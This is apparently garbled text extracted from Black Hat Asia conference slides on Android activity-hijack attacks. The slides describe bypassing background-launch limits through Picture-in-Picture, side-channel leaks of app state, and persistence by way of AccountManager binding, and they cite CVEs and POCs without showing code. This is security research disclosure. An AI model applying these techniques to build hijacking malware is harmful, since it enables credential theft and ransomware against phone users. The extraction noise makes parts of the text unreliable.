1、#BHASIA BlackHatEventsS SystemUIystemUI As As EvilPiPEvilPiPWeiMin Cheng()The Hijacking Attacks on Modern Mobile Device#BHASIA BlackHatEventsWhoAreWeWhoAreWeWeiMin ChengQI-ANXINGithub:MG1937Twitter:MGAldys4Yue �������LiuQI-ANXINGithub:lieanuMobile&AOSPBinary Researcher#BHASIA BlackHatEventsAgendaAgenda Wha
2、t is Activity Hijack Attack(AHA)Restrictions and Policies released by Google Bypass Security Policies Video Demo for Fullchain B�������AL Restriction Runtime State Leak Strictly LMKD#BHASIA BlackHatEventsWhat is AHAWhat is AHA Activity Hijack Attack(AHA)almost zero cost and easy to exploit Hijack target ap
3、p for��� stealing sensitive data or runtime privilege Adware,BankBot,Ransomware,Rat#BHASIA BlackHatEventsHow AHA WorkHow AHA Work Take Android4.0 as an example Cas������e of Simplocker,malware for Android4.0 Essence is abuse NEW_TASK FLAG to seize FG TaskCode snippet of Simplocker#BHASIA BlackHatEventsHow AH
4、A WorkHow AHA Work Ma������licouse Activity enter FG Task Previous Task pushed to BG Task Now Malwar���e can forge the trusted App,StrandHogg-like Hijack schemeWhy have to seize FG Task for hijack?#BHASIA BlackHatEventsTask And BackTask And Back-StackStack Task Stack is a collection of activities User can on
5、ly interact with ONE Front Task(in most case)#BHASIA BlackHatEventsClassic Attack SchemeClassic Attack Scheme#BHASIA BlackHatEventsClassic Attack SchemeClassic Attack SchemeLow cos�������t�����,high returnAlmost affects all App in Old Device#BHASIA BlackHatEventsKey Factors OF AHAKey Factors OF AHA Background A
6、ctivity Launch(BAL)Target Running State Detect Background Persistent Processaaass#BHASIA BlackHatEventsGoogle will not allow this happenGoogle will not allow this happen#BHA������SIA BlackHatEventsRestriction 0 x1 No Leak StateRestriction 0 x1 No Leak State getRunningTasks|getRunningAppProcesses requires
7、no permission Leak runtime state of other app by special interface before API22 Only Return Callers Data in API=22Get all running Task and Process#BHASIA������� BlackHatEventsRestriction 0 x1 No Leak StateRestriction 0 x1 No Lea�������k State Still have side-channel way to bypass in API26 cat/proc/target_pid/oom_
8、score_adj Work for non-privilege user!#BHASIA BlackHatEventsRestric�������tion 0 x1 No Leak StateRestriction 0 x1 No Leak State Google update SELinux Policy in 2017 Hidepid=2 like protections Restrict App access file in non-AppDomainhidepid in man7 Doc#BHASIA BlackHatEve�����ntsCompromise SchemeCompromise Schem
9、e Case of MysteryBot Turn to UsageStatsManager for leak runtime state indirectly Dangerous Runtime Permission required Complex User Interaction Some ROM force warn���� when grant!#BHASIA BlackHatEventsRestriction 0 x2 No BALRestriction 0 x2 No BALAPI29+App without privilege cant start Activity from Back
10、groundNo BAL=cant inject target from BackgroundMost Adware&Hijackware disppeared due ����to thishttps:/ BlackHatEventsCompromise SchemeCompromise Scheme Turn to AccessibilityService|SystemServices|SAW permission Complex User Interaction&Dangerous Runtime Permission Satisfy BAL Restriction Exemptions in
11、document Requires System System Bind ����Requires Visible App Bind Requires Holds System Privilege Almost impossible#BHASIA BlackHatEventsRestriction 0 x3 BEL&LMKDRestriction 0 x3 BEL&L��������MKD Background Service in API26+get High OOM_ADJ&Low Priority!BgProcess=IDLE Process,LMKD kill idle process first Syste
12、m Broadcast Trick BANNED in API24+!https:/ BlackHatEventsCompromise SchemeCompr�����omise SchemeStart Foreground Service For Low OOM_ADJ Have to notify User,no silent process 3rd ROM even not allow FgService long time runningCompromise scheme provided by Google#BHASIA BlackHatEventsBut,Compromise Scheme
13、Really Work?But,Compromise Scheme Really Work?Grant dangerous permission Complex User Interaction No �����Silent Running Awared by user Case Of Xiaomi OS,even no persistently process High attack cost,highly user detectable Attack failedframework.jar smali code of MIUI OSWhen#removeTaskAOSP will call#isPr
14、ocStateBackgr�����oundMIUI directly call forceStop to all process.#BHASIA BlackHatEventsSo,Any Way To Bypass?So,Any Way To Bypass?No Permission required Undetec�����table Hijack precisely Attack High Version Device#BHASIA BlackHatEvents1 1ststHigh Wall:BAL RestrictionHigh Wall:BAL Restriction#BHASIA BlackHatE
15、ventsAnalyseAnalyse BAL RestrictionBAL RestrictionActivityStarter#executeRequestAPI33Activity#startActivityHandled By ActivityManagerService(AMS)#BHASIA BlackHatEventsAnalyseAnalyse BAL RestrictionBAL RestrictionActivityStarter#setInitialStateActivityStarter#sta������rtActivityInnerrestrictedBgActivitymov
16、eToFrontdeterminesSystem try to start target componentStill nee������ds to focus on check funcand Bypass it.Decide whether to move Task to front#BHASIA BlackHatEventsAnalyseAnalyse BAL RestrictionBAL RestrictionshouldAbortBackgroundActivityStart(shouldABAS)How to define visible window?Developer Doc give s
17、ome exemption for check func#BHASIA BlackHatEventsAnalyseAnalyse BAL RestrictionBA������L RestrictionHow to define visible window?hasActiviteVisibleWindowDeveloper Doc give some exemption for check func#BHASIA BlackHatEventsAnalyseAnal������yse BAL RestrictionBAL RestrictionmNumNonAppVisibleWindowMapWindowState
18、#onSurfaceShownChangedInside hasNonAppVisibleWindow#BHASIA BlackHatEventsWindow Type&ZWindow Type&Z-AxisAxisWindowState#getWindowLayerFromTypeLwWindowToken#addWindowWindowComparator compare BaseLayer valueWindow Type decides mBa������seLayerWhich decides Z-axis indirectlyHigher BaseLayer,Higher Z-axis#BHA
19、SIA BlackHatEventsVisible WindowVisible WindowhasNonAppVisibleWind�������ow Window Type FIRST_SYSTEM_WINDOW&!=TYPE_TOASTTYPE_AP����PLICATION_OVERLAY=FIRST_SYSTEM_WINDOW+38;Non-Privilege App can only get a“system”windowwith TYPE_APPLICATION_OVERLAYBut requires SYSTEM_ALERT_WINDOW permissionWhich needs complex u
20、ser interact!Non-Privilege App usually gets BASE_APPLICATION windowAlmost invisible in most time#BHA������SIA BlackHatEventsWhat is Picture-in-Picture Non-SAW Permission float-window compromise scheme for developer Pinned Activity in PiP window at the top of screen Handled by SystemUI Component Window Typ
21、e FIRST_SYSTEM_WINDOW and Permission-less#BHASIA BlackHatEventsWhat is PictureWhat is Picture-inin-PicturePicture Non-SAW Permission float-window compromise scheme for developer Pinned Activity in PiP window at the top of screen Handled by SystemUI Component Window Type F�����IRST_SYSTEM_WINDOW and Permi
22、ssion-less#BHASIA BlackHatEventsWhat is PictureWhat is Picture-inin-PicturePicture Pip window cant hide from scre����en Pinned Activity can be detected by User(Even use transparent theme)User can remove PiP window at any time PiP is highly detectable feature!Unable to abuse PiP directly#BHASIA BlackHatE
23、ventsCVECVE-20212021-0485 By 0485 By valsamarasvalsamara�������sInvalid Input for a abnormal PiP WindowVisible for System,But Invisible for UserAbnormal 1 pixel PiP windowAlmost invisibleSets abnormal height and width#BHASIA BlackHatEventsaad7fdc4f82ad56e332d3c23c5d07719e069b099CVECVE-20212021-0485 By 0485
24、 By valsamarasvalsamarasPipBoundsAlgorithm Patch#BHASIA BlackHatEventsNew Att������ack SurfaceNew Attack SurfaceNice bug expanding Attack SurfaceNo need to bypass Window Visible Check(Abuse PiP)Create a legal System Window but User undetectableAbuse PiP API����� by abnormal input#BHASIA BlackHatEventsHow How P
25、iPPiP WorkWorkATMS#enterPictureInPictureModeRootWindowContainer#moveActivityToPinnedRootTask#BHASIA BlackHat������EventsHow������� How PiPPiP WorkWorkTask#sendTaskAppearShellTaskOrganizer#onTaskAppearedPipTaskOrganizer#onTaskAppearedIPCcom.android.systemuiPip rendered here#BHASIA BlackHatEventsHow How PiPPiP Wor
26、kWork#BHASIA BlackHa���tEventsAnalyseAnalyse Attack VectorAttack VectorPrevent IPC!Scheme 0 x1:Attack PiP chain,m���ake App task in visible stateBut no systemUI handle PiP window#BHASIA BlackHatEventsAnalyseAnalyse Attack VectorAttack VectorScheme 0 x1:User Space have no way to affect the code execute in
27、System_ServerCant prev�����ent IPCUnfortunately,no trick could be expl����oited#BHASIA BlackHatEventsAnalyseAnalyse Attack VectorAttack VectorScheme 0 x2:Attack SystemUI side,create CVE-2021-0485-like vuln#BHASIA BlackHatEventsAttack Attack SourceRectHintSourceRectHintAuto scale and crop the Activity Window
28、by passed-in RectAbnormal Rect Abnormal PiP Window?Developer Doc of setSourceRectHint API#BHASIA Blac������kHatEventsAround 0.5sAttack Attack SourceRectHintSourceRectHintEnter PiP Mode with 1-pixel Rect,Run POC in �������Android13.0.0_r7 branch AVDWe get a 1-pixel Window indeed,but recover to normal size within
29、0.5sAny Trick to expands duration?#BHASIA BlackHatEventsTrace Trace RectRectPipTaskOrganizer#onTaskAppearedanimateResizePipThis transition will resize PiP����� windowinto Rect defined size(1px)But what happen after resize?#BHASIA BlackHatEventsTrace Trace RectRectPipTransitionAnimator set a call back han
30、deronPipAnimationEnd int��������erface calledafter Pip entered,within calls finishResize#BHASIA BlackHatEventsTrace Trace RectRectfinishResize creates a WindowContainerTransaction(WCT)instancePass to prepareFinishResizeTransaction with normal size Rect defined by SystemSet a SurfaceControl.Tr���ansaction and t
31、he Rect for WCT inside function#BHASIA BlackHatEventsTrace Trace RectRectapplyFinishBoundsResize carry WCT to IPC with Syste�������mServer#BHASIA BlackHatEventsTrace Trace RectRectTask#setMainWindowSizeChangeTransa�����ctionExtra SurfaceControl.Transaction,IPC with SystemPass SCT into setMainWindowSizeChangeTra
32、nsactionapplyFin������ishBoundsResizeSystemServer directly call merge to render SCT on screenCause Pip Window resize to normal after merge,any way to prevent merge?*Before IPC#BHASIA BlackHatEventsTrace Trace RectRectBlock IPC for prevent merge#BHASIA BlackHatEventsTrace Trace RectRectAlmost no way to pre
33、vent merge#BHASIA BlackHatEventsDiff Diff AnalyseAnalyseCompare different bra�������nchAPI32 found code changeFunctional Patch instead ofSecurity Patch from commit detailStill valuable to analyse API32API32 DO N�������OT CALL merge!#BHASIA BlackHatEventsAPI32 For 12.1.0_r27API32 For 12.1.0_r27WindowStateAnimator#
34、setSurfaceBoundariesLockedGets the SCTHOOK FUNC!Sets the SCT#BHASIA Blac��������kHatEventsAnalyseAnalyse CALL STACKCALL STACKActivityRecord#prepareSurface in the call stackRelated with Activity Launch/Rendering(Enter PiP Mode will relaunch Activity)User space can affect it indirectly!#BHASIA BlackHatEventsA
35、ttack API32Attack API32 API33&API32 SystemUI all finally call to setMainWindowSizeChangeTransaction �������API331.setMWSCT call merge,no way prevent pip size back to normal2.Whole chain handled by SystemUI API321.setMWSCT sets SCT to global member,wait for access2.Activity reDraw will acces�����s SCT and call m
36、erge=frozen reDraw,merge will not be called#BHASIA BlackHatE������ventsCVECVE-20BAL Bypass API32We want API33+Bypass#BHASIA BlackHatEventsA ActivityOptionsctivityOptionsApi_diff list-makeLaunchIntoPipReturn ActivityOptions objec������tActivity#startActivity(Intent,Bundle)Additional options for
37、Activity launchhttps:/ BlackHatEventsA ActivityOptionsctivityOptionsActivityOptions#toBundleSave received PipParam to AO packaged Bundle By LAUNCH_INTO_PIP_PARAMS KeyBundle used to set options for Activity start#BHASIA BlackHatEventsTrace Bundl�����eTrace BundlestartActivityInner call moveToFront if App
38、pass BAL checkWhat Bundle will do inside chain?#BHASIA BlackHatEventsCVECVE-20Check Bundle by isLaunchIntoPip()�����Directly call moveActivityToPinnedRootTask without any check?Where is BAL restriction check?Set app to pinned state from background at any time for API33+#BHASI����A BlackHatEv
39、ents2 2ndndHigh Wall:State LeakingHigh Wall:State Leaking#BHASIA BlackHatEventsBug OR Trick?Bug OR Trick?Bug I met when I am developin������g an app After merge code throw Exception by startServiceCommon Before merge at bug position:bindService After merge at bug position:startService#BHASIA BlackHatEvent
40、sSide Channel DetectorSide Channel DetectorBackground Execution Limitation Throw exception when start background service Background Process Detector!Bypass Limitation?Explote Limitation!#BHASIA BlackHatEventsA A-2546745�������ActiveServices#startServiceLoc�������kedSystem return Abnormal ComponentNameT
41、hrow exception in User SpacePOC For side channel detect#BHASIA BlackHatEventsDue to time reason,more side-channel trick of other ������Rom in WhitePaper.Other Tricks?Other Tricks?#BHASIA BlackHatEvents3 3rdrdHigh Wall:Breaking LMKDHigh Wall:Breaking LMKD#BHASIA BlackHatEventsLMKD&OOM_ADJ ScoreLM������KD&OOM_ADJ
42、 ScoreLow-memory Killer Daemon Lower oom_adj Higher priority Higher oom_adj Lower priority LMKD kills high oom score process first Bg process always gets high oom score Fg Service usually gets score of 250 No silent process#BHASIA BlackHatEventsOOM_ADJ Calc TrickOOM_ADJ Calc TrickOomAd�����juster#c�������ompute
43、OomAdjLSPService bound by 3rdClient with oom score Bounder oom score Bounder may gets oom score VISIBLE_APP_ADJ#BHASIA BlackHatEventsAttack SurfaceAttack SurfaceBound by System persistent process?Non-privileg�����e App operate Managers(AMS,WMS)by correspond IBinder object.Managers run as system(UID=1000)
44、Can abuse Managers?#����BHASIA BlackHatEventsAccessibilityServiceAcce����ssibilityService Accessibility function handled by AccessibilityManagerService Non-privilege App needs to declare specific Intent-Filter Intent-Filter pointing a specific Service#BHASIA BlackHatEventsAccessibilityManagerServiceAccessib
45、ilityManagerService Accessib������ilityManagerService will find all Service with specific Intent-Filter Create AccessibilityServiceConnection by specific Intent-Filter Call bindLockedAccessibilityManagerService#updateServiceLocked#BHASIA BlackHatEventsBound by System!Bound by System!Accessibility��������ManagerSe
46、rvice run as system_server(UID=10���������00)System_server gets oom score of-900Non-privilege gets oom socre of 100!But Accessibility requires dangerous runtime-permission!#BHASIA BlackHatEventsAccountManagerAccountManagerAccountManager API added in API5(2009)Handled by privilege AccountManagerServiceFor Dev
47、elopers:Declare Service with abstract Component“AccountAuthenticator”!Declare Intent-Filter with specific Action!No Need dangerous runtime permission!#BHASIA BlackHatEventsAddAccountAddAccountGet AM by getSystemServiceCall addAccountn�������ew Session().bind()Bind specific componentas system_server!#BHASIA
48、 BlackHatEventsA A-2639277AccountManager$AmsTask$Response#onResultHigh Priority Process elevate to Persistent Process!Make Sy������stemServer keep binding target!POC#BHASIA BlackHatEventsDEMO OF PERSISTENT POCDEMO OF PERSISTENT POC#BHASIA BlackHatEvents#BHASIA BlackHatEventsFull Chain������� Of Hijack ExpFull Chain Of Hijack Exp#BHASIA BlackHatEvents#BHASIA BlackHatEventsTHANKS!THANKS!
sgpjbg002
工作日 8:30 - 17:30
会员动态:
报告分类
新质生产力
ChatGPT
新能源汽车
大模型
Sora
机器人
微短剧
芯片
薪酬
白皮书
低空经济
数据要素
创新药
人工智能
AI产业
信息科技
互联网
消费经济
汽车交通
电商零售
传媒娱乐
医药健康
投资金融
能源环境
地产开发
传统产业
全球化
其它
扫码登录
手机快捷登录
账号登录
